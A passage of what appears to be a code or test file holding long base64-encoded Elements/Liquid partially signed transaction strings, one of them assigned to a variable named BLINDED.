E/n1gjfSYtkIf3Mu8YnfwzfCbpGsY2w+KRDtemco7w+AHMY8TfjWH7/0UVjPTiMM38wlyABMQlOYjnwfTc38DtiEnnxMBQvqU3aRSvBCooZIhTZ1VX/rOEtjFX5sYlVUP+kFL/oDHw1bV7BlIEqYvvCjnJ0x7FOIuAiy7hCev40Rl+cK/c7+eOC6MMnxJFoHTazkdX35/MqU0qp2Fl6POkhkpFHYl/iLpQOIMHHn0sbU5HpxLBJ6BsueD9wBWssw+lTCowXqnk4d1K5Co0xVQWVT96/z1TjMTdZl9K87CyTn10HE/FMPse3IZNxvTszQPhdBdW8f5YFxK57kUrVo6Hqw3dDSwdRsamwOz0OoDhKRA5vRbwINn/eXiVz95q2YfIonY4RWbsjOuYfgBruOsbRsYmTYG0onAhnC4lfwUoZVvyTeIt7d3SJBz7CAb1ENCuXfiNdkWqh081/R/4gCRgSVk8iizgnIVEp1WpORNALo+ZA3JB8UK/2l2fRE0xgqBRWpJpSpNqAnlECrZy6lMXFQogXNGgLTNK8NKKZ1IW8uWOmFTZN98nB8sW8rKeNFPp9is6Jkz3WIbNXzzFIKcQCbAlQyabpXhGuKoDlP7Jd6ynW3c/ZoP65VdLIxLD8nlw/9KUBRCvss0/7OooydZ0nIS1EZhlMQ8ZQanNr8utcnnmx7h5WSRg3/Ze+acOYqQpKKp90eyLwOhp7ELUxVffF70Qud95+tg4EIJFlrybKB6ngzUyxtamlI7d0hzA7nryo9iAX6dVPXRnvC6krsfpt9bztTZp3/sBGWGRdTNWI+KWByoh5Qa6vYccaLd1mkhaVaPNuTp3/UAExun2509jheSPmrDx+2JffTVfXDCl1ybk9YcR+Z4V1H6DbzfJD62o8Ht3Oo2+c1z57onKeMBrgop12K8XwmAVlS9CEntoGjP2L9q7bdFK7ilGnLczktdhEbuLFrm1+Kv3I01PzV4OLmEMKeuVlR63PLGgSJe3wj5deIlXCC4Lqzr8v6LJfLpF2THnCQ1/DwhDEPLidvB1H/j9rAzgCrSAlNQ6hnWMRcbXSMIMM1XXWT/dI52jRIVll5b5puBryM3x8h/SCzi710Jx0+GnAGxV2kcIevW6EC58ywzjQPWDeeiLbYOXGPQYBJRNXv6peK4hvl+E0YqFg4gftrmQfM5Mszgr/QqaOM5XJUUoQuow9kzI/dF8J5RXMXehPfzmZKC+Vfbg+98Vj3iijXNb5KVIbXU4pFJu9B9YWYtK4oslkWHJP4BSzbfoF37X4u7r/G+9W6j5K0PH+prZ42T63r7XcvcZl1oWXuCPQVWlA2NOGJIvm7RUVheWfga7uOgPvJsiqHG+0GCv74xpxKZUFCUUn1BD2x8pHmICjbyFXBbi97uGAKKNLZoSUSyHxm4m5rURn+MS1FuD2BkNHoWOia16kSItId7ieiy93WUdo9eAB8XoP8feidVfZryYCkzu4cXTZcgxYioVpu5+aoY8lzXMoi7Hk1wv8LinG0aTZ/DB0O/mBn/1ZF95v3l0Nc15LGwKRFJYppVmFtp8RSHrdAaTwXA4SUBoNtwpqgvFJNAXwWIDj+VGtH/usMGzBpmOdgHg5jmrSGGsiVa2rAh0twyHuT12wcOBnK7LX7iftiKZ8RFp6oyyjdd+CMOVeLO+z3xo2ThGeePL2g9uwXCrvroEgvJ5zh+baqSDW6tWAD95WAKoSthhRqxSv73Lqn/mwW6A5zaFxiD6sSgJMnBXgdLy+//izFDoU9YiXAGm1AOYSwV3VOkFZueutG9DbISvTjyGyxcPCVEsxfpH/0sSW/QO175whD76moHD7Q/qtC0wZXqryzIb+Y/7qqWeYz6KPz+v/j2zYn4TENMQGHTEYk22Nyri88hmgWbnU6CaBTWnxtiXhrLiywbX270cooEt84p7EwVlzyUJuE1mrafxmtq5sptfjFFNLbT61UTd8YjbZ70tCStnymYFX38yo5zhGGn9W5EuQ+oWeewMDfymVykOpi72Bbcha9M1aZSslFFXFfwrUX6xZJLeyrRAS/lGEXun3lRzrNr93EGL5AFjL6juHLmqcfG+l7gFAjaMXCRt3uenalx3x52XxtDwG7azD7lcsD9pUbRE5FMaf2h2Kg61h5YgIOQbDoF57CJKys9boHHpGK+S2vYvlEl+C5c1DJWLVXKCGbB4gl7WXgCoyj264QfQ1IBy1XgKAuwetsBlXWaX6FPp6NSzM6e2MXQ7h9tzl3lwyZri7QlB7Tm9EatSAx3OUKRXRWp0AkCKcQtKoblEtLJ6kgh5Ekzcuesc9MM6ZThNfobaOyO2spdxogk/rvddhIq8fgd4nK7T3KvaZkfauifXQQZFAicp7xxeFD6HEuge9Q5jL3oHfaZ1KrSZctCY7HtXr8I5oHRbMv8n1/Ip5NJnrt8L17elnYWRWAr9NSFjuKhuZ7iTo2d8X0nstYc+linzzamECQo661fOMTeAw+ev+LZ12Ak4Q31xNBnpPoRnClrEHpQlucNazSNTYX23uZSYIWfjMVkb1/BswPluErENciH7dk1fhAoJrygUDI1YaZgm3OGC6gNrPuvN3iCLqOYCe999D41SDBkp2oJ+abg1DiUdRV3yw8n5roDadsQ7XSwx+S9VSazUua9IXC9LQmMIPWNBgjvzRy+z69N/bhPN8ZH/vgt1PgRtBKUP9lXsCwscFZPQYwqYBfa45wfjOwK+7eCqhvSS8R/c+qXq2348ewZ6krqGkkMjbQZpEi13cQEfr8PNOVb2NTwkG/Kh2NkLzI1zlYAyfkTmRFg/3eVx4aMnWjqXNaKtJSMrBo+L9glVXmfuVDcLXGFjws9XfkEdRE21Sf6f92W0V47Yv5FMjHfmky8dMQ/riXxbz5KYRWv8cUethtp2hlhizJqMKJl5uLop6P0o3mjqznxETg+WtD1PhnabxpvA8/tLzZqShO2Dkvh08GpKvjrNEvhJqxp8afTAigJCG4ur5FbMzTidd27ShFySUCY8VfIM4VSiRnkbzqQpCZ4obfGaLb1T267sSB+JPIdy+3fFLClhtT0ZMPUWWeatGSoH+GqW7IWuCERdN1j83ngOalczaktcc1dS6YYJrLg/srZH+kcrnGtO0NXGwL1+iE9z/JG13SyK3NJe1qggkixqgdfKJH5TLZQH1AAEA/VQBAgAAAAAB3J/IrUwUWy8EubZ6BxwFyKfoDnQFx8Ws3k0G+TsZ0vMBAAAAAP3///8DC3Nhx39lJvCLk85hLK2jOideItHxtmwbbBm1TX8i72e0CMMNyrbkaul04PRt3rrI6xW5bHZJ5He/eRY6am10RnCdAlGhFKKBV3QTY2LfUbhY9DDFmzdg3RJjOsmuvMHsq/aBFgAUIZejNpgO7ZxNU8/VHk+Yde2Nt0gKXXLGxoz72obRjRIitW10XkLnHe6XuTxgjdwoiSLX2dEIEjEAT0SqTZcQf7pthn4SIqxEp/AXEbH3eackEVQSvXcCH2Xx/4RDwnmCXfVbSRbvIIYHcgon/ko/Z/qsxfx2NLAWABTQxKPvCemXtumeOX5Rj+PkGhGMoQEYaWzyPjIJpuhEedAfE/55yQE1auU5B8yILP/T4mQBIwEAAAAAAAAA+QAAdAAAAAEBegpdcsbGjPvahtGNEiK1bXReQucd7pe5PGCN3CiJItfZ0QgSMQBPRKpNlxB/um2GfhIirESn8BcRsfd5pyQRVBK9dwIfZfH/hEPCeYJd9VtJFu8ghgdyCif+Sj9n+qzF/HY0sBYAFNDEo+8J6Ze26Z45flGP4+QaEYyhIgYC56slN7XUnpcDCargbp5J82zhyf671E7I4NHMoLT5wxkYc8XaClQAAIABAACAAAAAgAAAAAAAAAAAAQ4ghLK/ZrL/Qp6OnIo/TB3J8j4nYwlPq8i57lKBZgMg6XgBDwQBAAAAARAE/f///wv8CGVsZW1lbnRzAAgA4fUFAAAAAAv8CGVsZW1lbnRzASC0vDFvvZYaY1OBypwMOHCImi1rABcHHgGIzSOQbJt81Qv8CGVsZW1lbnRzAiAYaWzyPjIJpuhEedAfE/55yQE1auU5B8yILP/T4mQBIwv8CGVsZW1lbnRzAyCbUmpOG0+u3lnxy7+bij2JAfcKiXJ4hyK/E2OFxXxbkQf8BHBzZXQO/U4QYDMAAAAAAAAAAZHeKwBfNKVVpnI+FqH09q+ZGMBAELa8Jy2JXJqhP8TqRoueL7w70A+1efTnunpcM4Vv/HNjQdfRLWrgQA/wR6C7Eev4rA+RSGvcKrxHApafS/04BeWQKGXuqQYkKrw3ahLRWNCbFiF7Y0uwaN2BVD9IrdLis2SHCR1pDjkdInEBzIWXwjLzyM42tkmY5e9ZDwY/HIleJBeSPci7OXOo4IYV8exLicoFGv62MgJW+sa7eNwejbP7GTAuXtS+NwpdPUAxBTKoIkuPy9n4aNaaQxylvgnis2Zxum0MzspBde+YEGBlP4DMSh/U5HiLOuYUWRdUXV0J72TX2ERgtd3KBiaPEgueKxdDzBUcRIxT769BZVY54IS/zzDpDxJ4ZA5av7qyB1Ojg74O54JOq2JQwmhts5a4GdWnEFrpCt2Eeqar370y1N4d9vKacwYWUlrQoM6jNplf911SFyqeiWZdE6kEoPc77iz7rePu+A9vZ650PXr1rmvkY4wlDv/lSFS+pr3HpsMX7RnfS8YwSmKEF3IKTMvHdJ/2x5uc5kTObfjbJB/mC1p2yr6MEI5+nuxOp0xIc+QV/XkREPelerpazXvtxNYjjxoH6X0CM6IKtzqcTJPXUKj5SiKVBMU89jAunS9taBGbv2PvvNaWqps92qVjbz/XtkJ1dbdaB1o6pCSPWBO9VoJ5uJq/+WlBhHRnV6JtiisQui8oKFopP8+m/VTrwTtT1yEkMoEplRnpY0d2qwQydJLoX3RPz0tbbfDFdi40Vv8pEfk2HZYIRTsPRyFG/Sz92b6D5Oy4bYobd42tRNbBkBusphu0/RfrT9SuR/raXm83klYqPkcNLFHfotsEJxLEYsG4vZR+Cj/SK3jptLDWofQLB9jzQxoyM/Xk3voBE0DBDyTmge4SL8BGbzVvFIKv6gaK5YGN7b8FK2dhwu9yTsk+BOVLnYsi+UiGQKT8IMVhlig7IIpRN54i7GeCl0Edor+BO85PSWUWCAwdB5lL1FAhg/RDxgjiwemS/COQgUgixt91b1lNSb0qNbfOzFIT5hENdKfdDaqzzfXGOb+3/LKeK1RXjcKtOyGa7cLQotpEm3ET7SEjXM8NHzy9HBXRMCbE0LlxCsxSz9vu9VHuZzmSQh5fgRT1PUCb7NZCUoJNdBpxFJkiBRfsF0TTY3cw4mIdAEDkBsEWrmSWHYo8S9r2dhnI/92aJ2XVxBsVUu9x+txFBeqiOZB41JK5TZMFXe7yU0ghHpMTCbkgenn5vgongWIKz2aAUyqb7YvXozQvE7p44wy6PoOMDq+r4mru2XWaK/FNylNUYbdDLCXiGOBzEyyQ79hRRupGD3xPbYiQxeWNBRXZwD3WzZetPO1c7d7O5fswJQW9KRJD1MPbM0JAcNrLbUI5z+6+jQBBTkGNF7wmCwu5jMhkzUJANayfDzJyk8zTmTbDhtg0MoK0ydEQt5PHKHCbGl+fchNXQZDA81NN6MaviOSqSIaciNI7LoLH42E7nTVniobiobD9XB32wtihoAx8PEbbjavH7gDYyGWv2IpLBB0L1spJfdisS7V4XFS3DHd+P1B7q5yBxDhtTlM3p7MywsTyma3s/8NLI0VxyUdEYV+MvvIkd6dtZ62DTDcqmqnQTqyb+OmvCcZY3Xv8SATuXr9fUI8PJ/sGOFJRJJUu+uTZtpli31Kjtm5C82RWTiPeyOZAdkYTa1Qos5q2rINiQr3WFEUL1qRGXlq/EyDbpnG72fAFgsDfvSk26s8wFOSTrU1Ls+w0tm/ToSqwXWQKYjKfiSBpaA8cjz7B7NTOnf8D3RfYLlPLC0jKI4AVl1OHaJ1u+s87UWiphxMrLtOM1mmOVR0uoSDmtSbzS8VQHtUyVvSkBAF2AL3unIy+5Ke65YBeDMIUZ5mMui4w8SCKyIFl+E9ztQ7wjDeguIvN7C8B9l6rzUc1Lcsg2s5rk+OgNB8Arv4maqV41bleQIss98cpM/Q/FUFitRxLEHn3RuDSmciJQnoIoFskFikpRkFCmZKMuFfHH7U+//nFca7v8ow9H0GxeKAIdZLvv/4MvPkulbUoQUV9SMwXmuyI6Gx+8NWscNkftJ2mSPrT61GgQ+YtmKZ5OXA/BVezm5GN0bHN5gSSJAAYM5SqAyWs21BRS//PJEoHaY0cLKFyML1MTYYo/gyT3vTkGZmmhJVdkUpd2lHp0cG/nbALktC+GKo7fDlxq2MYvEOctqbvs1WXjUZ2IcuLTyXDmKI6VE1bJuC4XUce5lYfrfj55qqdHSX9ex7qkFKjyHuGAgranMN1PKm9JCQG0nc4ffH0AKVAhHINAAoTFuq9z9PkRjz93CDiKx5HXryY8nwthC/k9udZdH6PXmnrNzhG3nt/pfgaZ7pHllo1hroofC/24FnHkoTTNZXKdOFfAj6BKyan9WMsvy2f5DEEgdpLSajvP4r7RzzI85b6tbQYybAf8e0lZqAb1erVdp/I8/u20lxia1bieQknPUzK0gjE0l1CGC7iEWBLpf0xIkdBzee2rSpMMkOdyyw9p3kHHz9lizSVNKS/E2X5BMg/lNYiEUcavg3Qk4gkOmp3RWVteLYLJWUiaFreVbgdJmVZyMT+L9bb9NacNLKbiFfLdmc2gqytZsCj0NgERKX2Wc56s3Cdk8cfOfNnjOxJsi1KDPUxVMn3PO5gy00oMQQ6qa5VKtxw6d5rLXV9Mk0gOxVpasruLqwb2q9appaobWibUMZUGb+2ZIxtMzu0NEoG+yS2mTfkQhBo7L30h+wZMvj/Zp2Phc7wTVJOTIxFGjGXY/3SJbWh/sB09Ih2qguRGsaG57gK62z9kQ9oU1QMS8kWSoHuxxl4cg/CwJ74Qg+ENeY7w6ElszyL/AQXsGBZkd34n4hzrYSvAyT74pvePKeEWP/HAxI5Ivp+M+FDoCtrpyd5gPdPQsIfZnmO0age1iNiqqs6ATPxsEEE5MDro5YM4EdvDAJD0ZAeqGO0KZmNoKuiK2r3tJmLSbaZJoSpR4IUHqzuYrrdVkfewyUcyERbE9ujZxEvHcPcIJ9Z62tMVoMuz7v5pj01y2ohHPrLqIOWztsNNrwBIX9fQmwtSyl/3crgrfmtRmykyNsmg4echb3rF6iGBGioKvSeL8fpSLEIQDWwZuhR0QLExVRqNULMKmxYQJM3+ofk5Hpp2JA/c8vshFYGM6hi7LmOo9/XRaAzW0/u7wl4rZ5yxV1spti25vqBeAZK48E3RFmFX+1J5369Idrs8wkZtOt25FRGcy17F1k4Fb3J9BGof2UjmQWBSHhOOoDDci6KI1gfXfPPH8/Gz27wLG4+adiViEDjSVNihpkHCGI67ugBd1ZVIt1aiuf0Kv1Najrd+Jp+Y9tFM6SFs1ErvaR5vCDSAC2PYNFqbzwztm41h/LDmptxxQLuu2HhjWoaTiWJ5lRgavuuWf+dUuCS/FDhTD+4CmG2t1sgW9E75RKA06LNUbqwO4mOmv3gdzKqiixfCO7NIoHO8o1zz8g6lqvqG3w91o3APdtyLMCKJpoBr5XJl2yzDGEgFW6y0HN8e9P8KPX3/j3lg/MeEx8H6s2oG5ySfNNOldh3U15XKcElXpCHgtWfKknzahFeeqAVSu9ikn5ErbBVbIvGtBqC8UOdG2exuQTxhyrPmJGD0Lv/lx+YbweR8e1Ar3Y2H8ML+NzuW9hLqmeJyatC5Q+d2Zy0nyOcanGmQ4sKJd8Al7jhNMbczVgbM1dku5R9f5bzFHuZ2OzuQC21aTvVwRhbyo1fcLcsqqsuWUZ64OUE0HfYOQwF2Gv/It/uvvfM8FmGPfHJGuFRBUGP6lSiMr761KnVw6yGinFtFqTsky2GxMYJsTBCjDr7V4l55RPyCeknsJWOiwS94qqGJC8SRX5Ken2f8atut7kH4aSEDo+4tOSGUAAntUCfL5QnmaWg6BI+OykJx39v6EpnRaLb6oa3YtJvKXacbCYHp4Jmjp2ml1c0EKwh6z/ka2ad6pP0LKrDFo81GbV5E17U4p249tjfpHpnrt6MAhsNDi2bNgxl0CZkhjGpO681CuKQCbrX1spi/FqAU9mKinybwGya6fdS18kpNAyWK3UQ3DPvCH5NNRdXblUS2KDksUjLmd82DmpgloitifwcFPFNBaTJNKSn2FQ2U2demarYB8sHAc+rvJuZk+va10TX/5nRKmOIepXPQJDNUnqJxJn4rDW22g60hIgKPTejW+MvAwFJkI+AWn99Pk42YsPF3/C/PnJ34kyfUFSM3zT0DnAIh7vZa6eE09xogGqIXnnVAINZUbsfpjgK1xIkG5Jm9M8xujkhJBxjEViJLjPi4o50cnGvQAjEl1rFIm+TEBzKYh4QCpmwmsAdQXQnZBNCeXsg1qmtOTfvMBP5ImGnwiWyRy3ZO4pcF+G9NUEZGdXZ7X0G2i/Bqu5WgxmleArU8MzAIg9QSNMPScNk+MUjFTg0AaO+SjdOAhKvqBG8C1shp7b8c0ov5B7z/vUEMNMDNAOZjSvQNQoj6uLjKE8a/AqebQeXG7kf/H1lMElVDovQBDvAMu4HYVZSgyp7C7f8zQZKrdxUQnAnOiUzgjOBt0KA/tvmbPaoaBzUBaMp55HjbHSZluioeYso2jlZrzDs+ySK765yI6JOqQfsNedJuhnfbL340HSYQRPSWzYp0pux1Yem6+Lp4+B/7XzfjR6ZyuH+9RyG/Rl0/RYTFIl2BktMPEZai6sEZm4o/8IPWYVyuegHuzuyUECX/QlMlDOi8YDy6hoUOdivScvmx/I3deDA22pHBgYamZRDF/7A0p6SJqI6j9gGV/bVtzbu9bg1lnnuRFIKCYgGs88vpkpw9OSMz/UKKO6QAet0iVveRhaxjzkM4oDDbfJ772j4fK2/oNGsmaoKngJr7xFGW7ifwCsh+MynyGA0erJ1hz2BImr0XuiitdbxNC7yiIHzgY1DyuDOahagTHl61imiI1NQ78XkOj5vlaOHsnd2R5YC+zi9yrD1nRIiMULmhnqg4y3ZjtLUILsyn0vOKYmmzJeKnKjvQcI20Vvvx2dvAy83FDBoGJ7DZkA81YbjeLjWX8XHdzeUxVFwyz8zIkS1T603O+dTBbsJ8INEGzreYaAKOAzq18RxWcrt2z1TPqk2WhCbQ3xFr9WZw798NEVkeWFOo3aSFv4bI5PFH8i1HtnguowscNZgqM2Z+Wred/Drss+p21ptND9h5PdwrLzBtEfoI2nvPSqypF4aeDl2DZ+AekXBLAVx70XWGwV3MV1Sb71iy3hCFYUhduJrKr0K5mJo4bOOlB/wU/QXB56R3v5wmetrBow+wS1AEp3eyVkzrf+UuTDxVzD0U6ZKueCRBWxZ0NTyhsLQN30pn2vg4VvZ49MAIXwMWoDX0xCcO3DmWXGXfoDrDchMA0IbGeqTOD5HBSXtQxcPK+3FdmW8cavOYZRBbyg5ZzeRr9IAnDjsCKSRwkN2piOn8GDuTkDQ3HJNZ/mS5Rc6u1Ljjbfm73+ZYKbydMozTdCee2pW17aVpYOsUVjvhsxTPJqfDjk86JAtLUzWhgAiAgNwz6ZQbvQ6Si0chzjatj5UdQQ1B4oxJ2DRBGV9va2WLBhzxdoKVAAAgAEAAIAAAACAAQAAAAYAAAABAwiAMwI7AAAAAAEEFgAUgBae/BBuAYfqD59MMQv8vXi8P+0H/ARwc2V0AiADz91GzxnxEIsb+SQhEtW4GHzV3A7i0f/La05mix0nwwf8BHBzZXQGIQOGDl+vjfxGNWudl6wc9g7un30h6JjEIdB1dtHCEnlC6wf8BHBzZXQIBAAAAAAAIgICtnzNQ/FEKlH6zLX9ykQkha4BGwHSuc/ymM6yFZglAfsYc8XaClQAAIABAACAAAAAgAEAAAAHAAAAAQMIct/1BQAAAAABBBYAFDHUORI3eUFKBYByM9r5KsMZw49aB/wEcHNldAIgGGls8j4yCaboRHnQHxP+eckBNWrlOQfMiCz/0+JkASMH/ARwc2V0BiEDoAHNF1/99wkb65+cTZBod6eMN2ZNyaBLQd29kzdptVQH/ARwc2V0CAQAAAAAAAEDCICWmAAAAAAAAQQiACCHiaDbtsYzl+do6EgG78zG/3pwyGilJFg1WCmGNOgCKAf8BHBzZXQCIAPP3UbPGfEQixv5JCES1bgYfNXcDuLR/8trTmaLHSfDB/wEcHNldAYhAoNp6chO9RrYMnBivw3fP18Ug+0maDvTO1iy35dUJPd0B/wEcHNldAgEAAAAAAABAwiOAQAAAAAAAAEEAAf8BHBzZXQCIBhpbPI+Mgmm6ER50B8T/nnJATVq5TkHzIgs/9PiZAEjB/wEcHNldAgEAAAAAAA="
BLINDED = "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